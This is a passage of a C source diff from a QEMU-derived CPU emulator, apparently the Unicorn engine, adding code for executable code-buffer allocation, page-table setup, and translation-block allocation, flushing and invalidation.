old_protect; + VirtualProtect(addr, size, + PAGE_EXECUTE_READWRITE, &old_protect); +} +#else +static inline QEMU_UNUSED_FUNC void map_exec(void *addr, long size) +{ + unsigned long start, end, page_size; + + page_size = getpagesize(); + start = (unsigned long)addr; + start &= ~(page_size - 1); + + end = (unsigned long)addr + size; + end += page_size - 1; + end &= ~(page_size - 1); + + mprotect((void *)start, end - start, + PROT_READ | PROT_WRITE | PROT_EXEC); +} +#endif + +static void page_size_init(void) +{ + /* NOTE: we can always suppose that qemu_host_page_size >= + TARGET_PAGE_SIZE */ + qemu_real_host_page_size = getpagesize(); + if (qemu_host_page_size == 0) { + qemu_host_page_size = qemu_real_host_page_size; + } + if (qemu_host_page_size < TARGET_PAGE_SIZE) { + qemu_host_page_size = TARGET_PAGE_SIZE; + } + qemu_host_page_mask = ~(qemu_host_page_size - 1); +} + +static void page_init(void) +{ + page_size_init(); +#if defined(CONFIG_BSD) && defined(CONFIG_USER_ONLY) + { +#ifdef HAVE_KINFO_GETVMMAP + struct kinfo_vmentry *freep; + int i, cnt; + + freep = kinfo_getvmmap(getpid(), &cnt); + if (freep) { + mmap_lock(); + for (i = 0; i < cnt; i++) { + unsigned long startaddr, endaddr; + + startaddr = freep[i].kve_start; + endaddr = freep[i].kve_end; + if (h2g_valid(startaddr)) { + startaddr = h2g(startaddr) & TARGET_PAGE_MASK; + + if (h2g_valid(endaddr)) { + endaddr = h2g(endaddr); + page_set_flags(startaddr, endaddr, PAGE_RESERVED); + } else { +#if TARGET_ABI_BITS <= L1_MAP_ADDR_SPACE_BITS + endaddr = ~0ul; + page_set_flags(startaddr, endaddr, PAGE_RESERVED); +#endif + } + } + } + free(freep); + mmap_unlock(); + } +#else + FILE *f; + + last_brk = (unsigned long)sbrk(0); + + f = fopen("/compat/linux/proc/self/maps", "r"); + if (f) { + mmap_lock(); + + do { + unsigned long startaddr, endaddr; + int n; + + n = fscanf(f, "%lx-%lx %*[^\n]\n", &startaddr, &endaddr); + + if (n == 2 && h2g_valid(startaddr)) { + startaddr = h2g(startaddr) & TARGET_PAGE_MASK; + + if (h2g_valid(endaddr)) { + endaddr = h2g(endaddr); + } else { + endaddr = ~0ul; + } + page_set_flags(startaddr, endaddr, PAGE_RESERVED); + } + } while (!feof(f)); + + fclose(f); + mmap_unlock(); + } +#endif + } +#endif +} + +static PageDesc *page_find_alloc(struct uc_struct *uc, tb_page_addr_t index, int alloc) +{ + PageDesc *pd; + void **lp; + int i; + +#if defined(CONFIG_USER_ONLY) + /* We can't use g_malloc because it may recurse into a locked mutex. */ +# define ALLOC(P, SIZE) \ + do { \ + P = mmap(NULL, SIZE, PROT_READ | PROT_WRITE, \ + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \ + } while (0) +#else +# define ALLOC(P, SIZE) \ + do { P = g_malloc0(SIZE); } while (0) +#endif + + if (uc->l1_map == NULL) { + uc->l1_map_size = V_L1_SIZE * sizeof(uc->l1_map); + ALLOC(uc->l1_map, uc->l1_map_size); + } + + /* Level 1. Always allocated. */ + lp = uc->l1_map + ((index >> V_L1_SHIFT) & (V_L1_SIZE - 1)); + + /* Level 2..N-1. */ + for (i = V_L1_SHIFT / V_L2_BITS - 1; i > 0; i--) { + void **p = *lp; + + if (p == NULL) { + if (!alloc) { + return NULL; + } + ALLOC(p, sizeof(void *) * V_L2_SIZE); + *lp = p; + } + + lp = p + ((index >> (i * V_L2_BITS)) & (V_L2_SIZE - 1)); + } + + pd = *lp; + if (pd == NULL) { + if (!alloc) { + return NULL; + } + ALLOC(pd, sizeof(PageDesc) * V_L2_SIZE); + *lp = pd; + } + +#undef ALLOC + + return pd + (index & (V_L2_SIZE - 1)); +} + +static inline PageDesc *page_find(struct uc_struct *uc, tb_page_addr_t index) +{ + return page_find_alloc(uc, index, 0); +} + +#if !defined(CONFIG_USER_ONLY) +#define mmap_lock() do { } while (0) +#define mmap_unlock() do { } while (0) +#endif + +#if defined(CONFIG_USER_ONLY) +/* Currently it is not recommended to allocate big chunks of data in + user mode. It will change when a dedicated libc will be used. */ +/* ??? 64-bit hosts ought to have no problem mmaping data outside the + region in which the guest needs to run. Revisit this. */ +#define USE_STATIC_CODE_GEN_BUFFER +#endif + +/* ??? Should configure for this, not list operating systems here. */ +#if (defined(__linux__) \ + || defined(__FreeBSD__) || defined(__FreeBSD_kernel__) \ + || defined(__DragonFly__) || defined(__OpenBSD__) \ + || defined(__NetBSD__)) +# define USE_MMAP +#endif + +/* Minimum size of the code gen buffer. This number is randomly chosen, + but not so small that we can't have a fair number of TB's live. */ +#define MIN_CODE_GEN_BUFFER_SIZE (1024u * 1024) + +/* Maximum size of the code gen buffer we'd like to use. Unless otherwise + indicated, this is constrained by the range of direct branches on the + host cpu, as used by the TCG implementation of goto_tb. */ +#if defined(__x86_64__) +# define MAX_CODE_GEN_BUFFER_SIZE (2ul * 1024 * 1024 * 1024) +#elif defined(__sparc__) +# define MAX_CODE_GEN_BUFFER_SIZE (2ul * 1024 * 1024 * 1024) +#elif defined(__aarch64__) +# define MAX_CODE_GEN_BUFFER_SIZE (128ul * 1024 * 1024) +#elif defined(__arm__) +# define MAX_CODE_GEN_BUFFER_SIZE (16u * 1024 * 1024) +#elif defined(__s390x__) + /* We have a +- 4GB range on the branches; leave some slop. */ +# define MAX_CODE_GEN_BUFFER_SIZE (3ul * 1024 * 1024 * 1024) +#elif defined(__mips__) + /* We have a 256MB branch region, but leave room to make sure the + main executable is also within that region. */ +# define MAX_CODE_GEN_BUFFER_SIZE (128ul * 1024 * 1024) +#else +# define MAX_CODE_GEN_BUFFER_SIZE ((size_t)-1) +#endif + +#define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (8 * 1024 * 1024) + +#define DEFAULT_CODE_GEN_BUFFER_SIZE \ + (DEFAULT_CODE_GEN_BUFFER_SIZE_1 < MAX_CODE_GEN_BUFFER_SIZE \ + ? DEFAULT_CODE_GEN_BUFFER_SIZE_1 : MAX_CODE_GEN_BUFFER_SIZE) + +static inline size_t size_code_gen_buffer(struct uc_struct *uc, size_t tb_size) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* Size the buffer. */ + if (tb_size == 0) { +#ifdef USE_STATIC_CODE_GEN_BUFFER + tb_size = DEFAULT_CODE_GEN_BUFFER_SIZE; +#else + /* ??? Needs adjustments. */ + /* ??? If we relax the requirement that CONFIG_USER_ONLY use the + static buffer, we could size this on RESERVED_VA, on the text + segment size of the executable, or continue to use the default. */ + tb_size = (unsigned long)DEFAULT_CODE_GEN_BUFFER_SIZE; +#endif + } + if (tb_size < MIN_CODE_GEN_BUFFER_SIZE) { + tb_size = MIN_CODE_GEN_BUFFER_SIZE; + } + if (tb_size > MAX_CODE_GEN_BUFFER_SIZE) { + tb_size = MAX_CODE_GEN_BUFFER_SIZE; + } + tcg_ctx->code_gen_buffer_size = tb_size; + return tb_size; +} + +#ifdef __mips__ +/* In order to use J and JAL within the code_gen_buffer, we require + that the buffer not cross a 256MB boundary. */ +static inline bool cross_256mb(void *addr, size_t size) +{ + return ((uintptr_t)addr ^ ((uintptr_t)addr + size)) & 0xf0000000; +} + +/* We weren't able to allocate a buffer without crossing that boundary, + so make do with the larger portion of the buffer that doesn't cross. + Returns the new base of the buffer, and adjusts code_gen_buffer_size. */ +static inline void *split_cross_256mb(struct uc_struct *uc, void *buf1, size_t size1) +{ + void *buf2 = (void *)(((uintptr_t)buf1 + size1) & 0xf0000000); + size_t size2 = buf1 + size1 - buf2; + TCGContext *tcg_ctx = uc->tcg_ctx; + + size1 = buf2 - buf1; + if (size1 < size2) { + size1 = size2; + buf1 = buf2; + } + + tcg_ctx->code_gen_buffer_size = size1; + return buf1; +} +#endif + +#ifdef USE_STATIC_CODE_GEN_BUFFER +static uint8_t QEMU_ALIGN(CODE_GEN_ALIGN, static_code_gen_buffer[DEFAULT_CODE_GEN_BUFFER_SIZE]); + +void free_code_gen_buffer(struct uc_struct *uc) +{ + // Do nothing, we use a static buffer. +} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + void *buf = static_code_gen_buffer; +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + buf = split_cross_256mb(buf, tcg_ctx->code_gen_buffer_size); + } +#endif + map_exec(buf, tcg_ctx->code_gen_buffer_size); + return buf; +} +#elif defined(USE_MMAP) +void free_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + if (tcg_ctx->code_gen_buffer) + munmap(tcg_ctx->code_gen_buffer, tcg_ctx->code_gen_buffer_size); +} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + int flags = MAP_PRIVATE | MAP_ANONYMOUS; + uintptr_t start = 0; + void *buf; + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* Constrain the position of the buffer based on the host cpu. + Note that these addresses are chosen in concert with the + addresses assigned in the relevant linker script file. */ +# if defined(__PIE__) || defined(__PIC__) + /* Don't bother setting a preferred location if we're building + a position-independent executable. We're more likely to get + an address near the main executable if we let the kernel + choose the address. */ +# elif defined(__x86_64__) && defined(MAP_32BIT) + /* Force the memory down into low memory with the executable. + Leave the choice of exact location with the kernel. */ + flags |= MAP_32BIT; + /* Cannot expect to map more than 800MB in low memory. */ + if (tcg_ctx->code_gen_buffer_size > 800u * 1024 * 1024) { + tcg_ctx->code_gen_buffer_size = 800u * 1024 * 1024; + } +# elif defined(__sparc__) + start = 0x40000000ul; +# elif defined(__s390x__) + start = 0x90000000ul; +# elif defined(__mips__) + /* ??? We ought to more explicitly manage layout for softmmu too. */ +# ifdef CONFIG_USER_ONLY + start = 0x68000000ul; +# elif _MIPS_SIM == _ABI64 + start = 0x128000000ul; +# else + start = 0x08000000ul; +# endif +# endif + + buf = mmap((void *)start, tcg_ctx->code_gen_buffer_size, + PROT_WRITE | PROT_READ | PROT_EXEC, flags, -1, 0); + if (buf == MAP_FAILED) { + return NULL; + } + +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + /* Try again, with the original still mapped, to avoid re-acquiring + that 256mb crossing. This time don't specify an address. */ + size_t size2, size1 = tcg_ctx->code_gen_buffer_size; + void *buf2 = mmap(NULL, size1, PROT_WRITE | PROT_READ | PROT_EXEC, + flags, -1, 0); + if (buf2 != MAP_FAILED) { + if (!cross_256mb(buf2, size1)) { + /* Success! Use the new buffer. */ + munmap(buf, size1); + return buf2; + } + /* Failure. Work with what we had. */ + munmap(buf2, size1); + } + + /* Split the original buffer. Free the smaller half. */ + buf2 = split_cross_256mb(buf, size1); + size2 = tcg_ctx->code_gen_buffer_size; + munmap(buf + (buf == buf2 ? size2 : 0), size1 - size2); + return buf2; + } +#endif + + return buf; +} +#else +void free_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + if (tcg_ctx->code_gen_buffer) + g_free(tcg_ctx->code_gen_buffer); +} + +static inline void *alloc_code_gen_buffer(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + void *buf = g_malloc(tcg_ctx->code_gen_buffer_size); + + if (buf == NULL) { + return NULL; + } + +#ifdef __mips__ + if (cross_256mb(buf, tcg_ctx->code_gen_buffer_size)) { + void *buf2 = g_malloc(tcg_ctx->code_gen_buffer_size); + if (buf2 != NULL && !cross_256mb(buf2, size1)) { + /* Success! Use the new buffer. */ + free(buf); + buf = buf2; + } else { + /* Failure. Work with what we had. Since this is malloc + and not mmap, we can't free the other half. */ + free(buf2); + buf = split_cross_256mb(buf, tcg_ctx->code_gen_buffer_size); + } + } +#endif + + map_exec(buf, tcg_ctx->code_gen_buffer_size); + return buf; +} +#endif /* USE_STATIC_CODE_GEN_BUFFER, USE_MMAP */ + +static inline void code_gen_alloc(struct uc_struct *uc, size_t tb_size) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + tcg_ctx->code_gen_buffer_size = size_code_gen_buffer(uc, tb_size); + tcg_ctx->code_gen_buffer = alloc_code_gen_buffer(uc); + if (tcg_ctx->code_gen_buffer == NULL) { + fprintf(stderr, "Could not allocate dynamic translator buffer\n"); + exit(1); + } + + //qemu_madvise(tcg_ctx.code_gen_buffer, tcg_ctx.code_gen_buffer_size, + // QEMU_MADV_HUGEPAGE); + + /* Steal room for the prologue at the end of the buffer. This ensures + (via the MAX_CODE_GEN_BUFFER_SIZE limits above) that direct branches + from TB's to the prologue are going to be in range. It also means + that we don't need to mark (additional) portions of the data segment + as executable. */ + tcg_ctx->code_gen_prologue = (char*)tcg_ctx->code_gen_buffer + + tcg_ctx->code_gen_buffer_size - 1024; + tcg_ctx->code_gen_buffer_size -= 1024; + + tcg_ctx->code_gen_buffer_max_size = tcg_ctx->code_gen_buffer_size - + (TCG_MAX_OP_SIZE * OPC_BUF_SIZE); + tcg_ctx->code_gen_max_blocks = tcg_ctx->code_gen_buffer_size / + CODE_GEN_AVG_BLOCK_SIZE; + tcg_ctx->tb_ctx.tbs = + g_malloc(tcg_ctx->code_gen_max_blocks * sizeof(TranslationBlock)); +} + +/* Must be called before using the QEMU cpus. 'tb_size' is the size + (in bytes) allocated to the translation buffer. Zero means default + size. */ +void tcg_exec_init(struct uc_struct *uc, unsigned long tb_size) +{ + TCGContext *tcg_ctx; + + cpu_gen_init(uc); + code_gen_alloc(uc, tb_size); + tcg_ctx = uc->tcg_ctx; + tcg_ctx->code_gen_ptr = tcg_ctx->code_gen_buffer; + tcg_ctx->uc = uc; + page_init(); +#if !defined(CONFIG_USER_ONLY) || !defined(CONFIG_USE_GUEST_BASE) + /* There's no guest base to take into account, so go ahead and + initialize the prologue now. */ + tcg_prologue_init(tcg_ctx); +#endif +} + +bool tcg_enabled(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + return tcg_ctx->code_gen_buffer != NULL; +} + +/* Allocate a new translation block. Flush the translation buffer if + too many translation blocks or too much generated code. */ +static TranslationBlock *tb_alloc(struct uc_struct *uc, target_ulong pc) +{ + TranslationBlock *tb; + TCGContext *tcg_ctx = uc->tcg_ctx; + + if (tcg_ctx->tb_ctx.nb_tbs >= tcg_ctx->code_gen_max_blocks || + (size_t)(((char*)tcg_ctx->code_gen_ptr - (char*)tcg_ctx->code_gen_buffer)) >= + tcg_ctx->code_gen_buffer_max_size) { + return NULL; + } + tb = &tcg_ctx->tb_ctx.tbs[tcg_ctx->tb_ctx.nb_tbs++]; + tb->pc = pc; + tb->cflags = 0; + return tb; +} + +void tb_free(struct uc_struct *uc, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + /* In practice this is mostly used for single use temporary TB + Ignore the hard cases and just back up if this TB happens to + be the last one generated. */ + if (tcg_ctx->tb_ctx.nb_tbs > 0 && + tb == &tcg_ctx->tb_ctx.tbs[tcg_ctx->tb_ctx.nb_tbs - 1]) { + tcg_ctx->code_gen_ptr = tb->tc_ptr; + tcg_ctx->tb_ctx.nb_tbs--; + } +} + +static inline void invalidate_page_bitmap(PageDesc *p) +{ + if (p->code_bitmap) { + g_free(p->code_bitmap); + p->code_bitmap = NULL; + } + p->code_write_count = 0; +} + +/* Set to NULL all the 'first_tb' fields in all PageDescs. */ +static void page_flush_tb_1(int level, void **lp) +{ + int i; + + if (*lp == NULL) { + return; + } + if (level == 0) { + PageDesc *pd = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + pd[i].first_tb = NULL; + invalidate_page_bitmap(pd + i); + } + } else { + void **pp = *lp; + + for (i = 0; i < V_L2_SIZE; ++i) { + page_flush_tb_1(level - 1, pp + i); + } + } +} + +static void page_flush_tb(struct uc_struct *uc) +{ + int i; + + if (uc->l1_map == NULL) + return; + + for (i = 0; i < V_L1_SIZE; i++) { + page_flush_tb_1(V_L1_SHIFT / V_L2_BITS - 1, uc->l1_map + i); + } +} + +/* flush all the translation blocks */ +/* XXX: tb_flush is currently not thread safe */ +void tb_flush(CPUArchState *env1) +{ + CPUState *cpu = ENV_GET_CPU(env1); + struct uc_struct* uc = cpu->uc; + TCGContext *tcg_ctx = uc->tcg_ctx; + +#if defined(DEBUG_FLUSH) + printf("qemu: flush code_size=%ld nb_tbs=%d avg_tb_size=%ld\n", + (unsigned long)(tcg_ctx->code_gen_ptr - tcg_ctx->code_gen_buffer), + tcg_ctx->tb_ctx.nb_tbs, tcg_ctx->tb_ctx.nb_tbs > 0 ? + ((unsigned long)(tcg_ctx->code_gen_ptr - tcg_ctx->code_gen_buffer)) / + tcg_ctx->tb_ctx.nb_tbs : 0); +#endif + if ((unsigned long)((char*)tcg_ctx->code_gen_ptr - (char*)tcg_ctx->code_gen_buffer) + > tcg_ctx->code_gen_buffer_size) { + cpu_abort(cpu, "Internal error: code buffer overflow\n"); + } + tcg_ctx->tb_ctx.nb_tbs = 0; + + memset(cpu->tb_jmp_cache, 0, sizeof(cpu->tb_jmp_cache)); + + memset(tcg_ctx->tb_ctx.tb_phys_hash, 0, sizeof(tcg_ctx->tb_ctx.tb_phys_hash)); + page_flush_tb(uc); + + tcg_ctx->code_gen_ptr = tcg_ctx->code_gen_buffer; + /* XXX: flush processor icache at this point if cache flush is + expensive */ + tcg_ctx->tb_ctx.tb_flush_count++; +} + +#ifdef DEBUG_TB_CHECK + +static void tb_invalidate_check(target_ulong address) +{ + TranslationBlock *tb; + int i; + + address &= TARGET_PAGE_MASK; + for (i = 0; i < CODE_GEN_PHYS_HASH_SIZE; i++) { + for (tb = tb_ctx.tb_phys_hash[i]; tb != NULL; tb = tb->phys_hash_next) { + if (!(address + TARGET_PAGE_SIZE <= tb->pc || + address >= tb->pc + tb->size)) { + printf("ERROR invalidate: address=" TARGET_FMT_lx + " PC=%08lx size=%04x\n", + address, (long)tb->pc, tb->size); + } + } + } +} + +/* verify that all the pages have correct rights for code */ +static void tb_page_check(struct uc_struct *uc) +{ + TranslationBlock *tb; + int i, flags1, flags2; + TCGContext *tcg_ctx = uc->tcg_ctx; + + for (i = 0; i < CODE_GEN_PHYS_HASH_SIZE; i++) { + for (tb = tcg_ctx->tb_ctx.tb_phys_hash[i]; tb != NULL; + tb = tb->phys_hash_next) { + flags1 = page_get_flags(tb->pc); + flags2 = page_get_flags(tb->pc + tb->size - 1); + if ((flags1 & PAGE_WRITE) || (flags2 & PAGE_WRITE)) { + printf("ERROR page flags: PC=%08lx size=%04x f1=%x f2=%x\n", + (long)tb->pc, tb->size, flags1, flags2); + } + } + } +} + +#endif + +static inline void tb_hash_remove(TranslationBlock **ptb, TranslationBlock *tb) +{ + TranslationBlock *tb1; + + for (;;) { + tb1 = *ptb; + if (tb1 == tb) { + *ptb = tb1->phys_hash_next; + break; + } + ptb = &tb1->phys_hash_next; + } +} + +static inline void tb_page_remove(TranslationBlock **ptb, TranslationBlock *tb) +{ + TranslationBlock *tb1; + unsigned int n1; + + for (;;) { + tb1 = *ptb; + n1 = (uintptr_t)tb1 & 3; + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + if (tb1 == tb) { + *ptb = tb1->page_next[n1]; + break; + } + ptb = &tb1->page_next[n1]; + } +} + +static inline void tb_jmp_remove(TranslationBlock *tb, int n) +{ + TranslationBlock *tb1, **ptb; + unsigned int n1; + + ptb = &tb->jmp_next[n]; + tb1 = *ptb; + if (tb1) { + /* find tb(n) in circular list */ + for (;;) { + tb1 = *ptb; + n1 = (uintptr_t)tb1 & 3; + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + if (n1 == n && tb1 == tb) { + break; + } + if (n1 == 2) { + ptb = &tb1->jmp_first; + } else { + ptb = &tb1->jmp_next[n1]; + } + } + /* now we can suppress tb(n) from the list */ + *ptb = tb->jmp_next[n]; + + tb->jmp_next[n] = NULL; + } +} + +/* reset the jump entry 'n' of a TB so that it is not chained to + another TB */ +static inline void tb_reset_jump(TranslationBlock *tb, int n) +{ + tb_set_jmp_target(tb, n, (uintptr_t)((char*)tb->tc_ptr + tb->tb_next_offset[n])); +} + +/* invalidate one TB */ +void tb_phys_invalidate(struct uc_struct *uc, + TranslationBlock *tb, tb_page_addr_t page_addr) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + CPUState *cpu = uc->cpu; + PageDesc *p; + unsigned int h, n1; + tb_page_addr_t phys_pc; + TranslationBlock *tb1, *tb2; + + /* remove the TB from the hash list */ + phys_pc = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); + h = tb_phys_hash_func(phys_pc); + tb_hash_remove(&tcg_ctx->tb_ctx.tb_phys_hash[h], tb); + + /* remove the TB from the page list */ + if (tb->page_addr[0] != page_addr) { + p = page_find(uc, tb->page_addr[0] >> TARGET_PAGE_BITS); + tb_page_remove(&p->first_tb, tb); + invalidate_page_bitmap(p); + } + if (tb->page_addr[1] != -1 && tb->page_addr[1] != page_addr) { + p = page_find(uc, tb->page_addr[1] >> TARGET_PAGE_BITS); + tb_page_remove(&p->first_tb, tb); + invalidate_page_bitmap(p); + } + + tcg_ctx->tb_ctx.tb_invalidated_flag = 1; + + /* remove the TB from the hash list */ + h = tb_jmp_cache_hash_func(tb->pc); + if (cpu->tb_jmp_cache[h] == tb) { + cpu->tb_jmp_cache[h] = NULL; + } + + /* suppress this TB from the two jump lists */ + tb_jmp_remove(tb, 0); + tb_jmp_remove(tb, 1); + + /* suppress any remaining jumps to this TB */ + tb1 = tb->jmp_first; + for (;;) { + n1 = (uintptr_t)tb1 & 3; + if (n1 == 2) { + break; + } + tb1 = (TranslationBlock *)((uintptr_t)tb1 & ~3); + tb2 = tb1->jmp_next[n1]; + tb_reset_jump(tb1, n1); + tb1->jmp_next[n1] = NULL; + tb1 = tb2; + } + tb->jmp_first = (TranslationBlock *)((uintptr_t)tb | 2); /* fail safe */ + + tcg_ctx->tb_ctx.tb_phys_invalidate_count++; +} + +static inline void set_bits(uint8_t *tab, int start, int len) +{ + int end, mask, end1; + + end = start + len; + tab += start >> 3; + mask = 0xff << (start & 7); + if ((start & ~7) == (end & ~7)) { + if (start < end) { + mask &= ~(0xff << (end & 7)); + *tab |= mask; + } + } else { + *tab++ |= mask; + start = (start + 8) & ~7; + end1 = end & ~7; + while (start < end1) { + *tab++ = 0xff; + start += 8; + } + if (start < end) { + mask = ~(0xff << (end & 7)); + *tab |= mask; + } + } +} + +static void build_page_bitmap(PageDesc *p) +{ + int n, tb_start, tb_end; + TranslationBlock *tb; + + p->code_bitmap = g_malloc0(TARGET_PAGE_SIZE / 8); + + tb = p->first_tb; + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); + /* NOTE: this is subtle as a TB may span two physical pages */ + if (n == 0) { + /* NOTE: tb_end may be after the end of the page, but + it is not a problem */ + tb_start = tb->pc & ~TARGET_PAGE_MASK; + tb_end = tb_start + tb->size; + if (tb_end > TARGET_PAGE_SIZE) { + tb_end = TARGET_PAGE_SIZE; + } + } else { + tb_start = 0; + tb_end = ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); + } + set_bits(p->code_bitmap, tb_start, tb_end - tb_start); + tb = tb->page_next[n]; + } +} + +TranslationBlock *tb_gen_code(CPUState *cpu, + target_ulong pc, target_ulong cs_base, + int flags, int cflags) // qq +{ + CPUArchState *env = cpu->env_ptr; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TranslationBlock *tb; + tb_page_addr_t phys_pc, phys_page2; + int code_gen_size; + int ret; + + phys_pc = get_page_addr_code(env, pc); + tb = tb_alloc(env->uc, pc); + if (!tb) { + /* flush must be done */ + tb_flush(env); + /* cannot fail at this point */ + tb = tb_alloc(env->uc, pc); + /* Don't forget to invalidate previous TB info. */ + tcg_ctx->tb_ctx.tb_invalidated_flag = 1; + } + tb->tc_ptr = tcg_ctx->code_gen_ptr; + tb->cs_base = cs_base; + tb->flags = flags; + tb->cflags = cflags; + ret = cpu_gen_code(env, tb, &code_gen_size); // qq + if (ret == -1) { + tb_free(env->uc, tb); + return NULL; + } + tcg_ctx->code_gen_ptr = (void *)(((uintptr_t)tcg_ctx->code_gen_ptr + + code_gen_size + CODE_GEN_ALIGN - 1) & ~(CODE_GEN_ALIGN - 1)); + + phys_page2 = -1; + /* check next page if needed */ + if (tb->size) { + target_ulong virt_page2 = (pc + tb->size - 1) & TARGET_PAGE_MASK; + if ((pc & TARGET_PAGE_MASK) != virt_page2) { + phys_page2 = get_page_addr_code(env, virt_page2); + } + } + tb_link_page(cpu->uc, tb, phys_pc, phys_page2); + return tb; +} + +/* + * Invalidate all TBs which intersect with the target physical address range + * [start;end[. NOTE: start and end may refer to *different* physical pages. + * 'is_cpu_write_access' should be true if called from a real cpu write + * access: the virtual CPU will exit the current TB if code is modified inside + * this TB. + */ +void tb_invalidate_phys_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access) +{ + while (start < end) { + tb_invalidate_phys_page_range(uc, start, end, is_cpu_write_access); + start &= TARGET_PAGE_MASK; + start += TARGET_PAGE_SIZE; + } +} + +/* + * Invalidate all TBs which intersect with the target physical address range + * [start;end[. NOTE: start and end must refer to the *same* physical page. + * 'is_cpu_write_access' should be true if called from a real cpu write + * access: the virtual CPU will exit the current TB if code is modified inside + * this TB. + */ +void tb_invalidate_phys_page_range(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end, + int is_cpu_write_access) +{ + TranslationBlock *tb, *tb_next, *saved_tb; + CPUState *cpu = uc->current_cpu; +#if defined(TARGET_HAS_PRECISE_SMC) + CPUArchState *env = NULL; +#endif + tb_page_addr_t tb_start, tb_end; + PageDesc *p; + int n; +#ifdef TARGET_HAS_PRECISE_SMC + int current_tb_not_found = is_cpu_write_access; + TranslationBlock *current_tb = NULL; + int current_tb_modified = 0; + target_ulong current_pc = 0; + target_ulong current_cs_base = 0; + int current_flags = 0; +#endif /* TARGET_HAS_PRECISE_SMC */ + + p = page_find(uc, start >> TARGET_PAGE_BITS); + if (!p) { + return; + } + if (!p->code_bitmap && + ++p->code_write_count >= SMC_BITMAP_USE_THRESHOLD && + is_cpu_write_access) { + /* build code bitmap */ + build_page_bitmap(p); + } +#if defined(TARGET_HAS_PRECISE_SMC) + if (cpu != NULL) { + env = cpu->env_ptr; + } +#endif + + /* we remove all the TBs in the range [start, end[ */ + /* XXX: see if in some cases it could be faster to invalidate all + the code */ + tb = p->first_tb; + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); + tb_next = tb->page_next[n]; + /* NOTE: this is subtle as a TB may span two physical pages */ + if (n == 0) { + /* NOTE: tb_end may be after the end of the page, but + it is not a problem */ + tb_start = tb->page_addr[0] + (tb->pc & ~TARGET_PAGE_MASK); + tb_end = tb_start + tb->size; + } else { + tb_start = tb->page_addr[1]; + tb_end = tb_start + ((tb->pc + tb->size) & ~TARGET_PAGE_MASK); + } + if (!(tb_end <= start || tb_start >= end)) { +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_not_found) { + current_tb_not_found = 0; + current_tb = NULL; + if (cpu->mem_io_pc) { + /* now we have a real cpu fault */ + current_tb = tb_find_pc(uc, cpu->mem_io_pc); + } + } + if (current_tb == tb && + (current_tb->cflags & CF_COUNT_MASK) != 1) { + /* If we are modifying the current TB, we must stop + its execution. We could be more precise by checking + that the modification is after the current PC, but it + would require a specialized function to partially + restore the CPU state */ + + current_tb_modified = 1; + // self-modifying code will restore state from TB + cpu_restore_state_from_tb(cpu, current_tb, cpu->mem_io_pc); + cpu_get_tb_cpu_state(env, ¤t_pc, ¤t_cs_base, + ¤t_flags); + } +#endif /* TARGET_HAS_PRECISE_SMC */ + /* we need to do that to handle the case where a signal + occurs while doing tb_phys_invalidate() */ + saved_tb = NULL; + if (cpu != NULL) { + saved_tb = cpu->current_tb; + cpu->current_tb = NULL; + } + tb_phys_invalidate(uc, tb, -1); + if (cpu != NULL) { + cpu->current_tb = saved_tb; + if (cpu->interrupt_request && cpu->current_tb) { + cpu_interrupt(cpu, cpu->interrupt_request); + } + } + } + tb = tb_next; + } +#if !defined(CONFIG_USER_ONLY) + /* if no code remaining, no need to continue to use slow writes */ + if (!p->first_tb) { + invalidate_page_bitmap(p); + if (is_cpu_write_access) { + tlb_unprotect_code_phys(cpu, start, cpu->mem_io_vaddr); + } + } +#endif +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb_modified) { + /* we generate a block containing just the instruction + modifying the memory. It will ensure that it cannot modify + itself */ + cpu->current_tb = NULL; + tb_gen_code(cpu, current_pc, current_cs_base, current_flags, 1); + cpu_resume_from_signal(cpu, NULL); + } +#endif +} + +#if !defined(CONFIG_SOFTMMU) +static void tb_invalidate_phys_page(struct uc_struct *uc, tb_page_addr_t addr, + uintptr_t pc, void *puc, + bool locked) +{ + TranslationBlock *tb; + PageDesc *p; + int n; +#ifdef TARGET_HAS_PRECISE_SMC + TranslationBlock *current_tb = NULL; + CPUState *cpu = uc->current_cpu; + CPUArchState *env = NULL; + int current_tb_modified = 0; + target_ulong current_pc = 0; + target_ulong current_cs_base = 0; + int current_flags = 0; +#endif + + addr &= TARGET_PAGE_MASK; + p = page_find(addr >> TARGET_PAGE_BITS); + if (!p) { + return; + } + tb = p->first_tb; +#ifdef TARGET_HAS_PRECISE_SMC + if (tb && pc != 0) { + current_tb = tb_find_pc(uc, pc); + } + if (cpu != NULL) { + env = cpu->env_ptr; + } +#endif + while (tb != NULL) { + n = (uintptr_t)tb & 3; + tb = (TranslationBlock *)((uintptr_t)tb & ~3); +#ifdef TARGET_HAS_PRECISE_SMC + if (current_tb == tb && + (current_tb->cflags & CF_COUNT_MASK) != 1) { + /* If we are modifying the current TB, we must stop + its execution. We could be more precise by checking 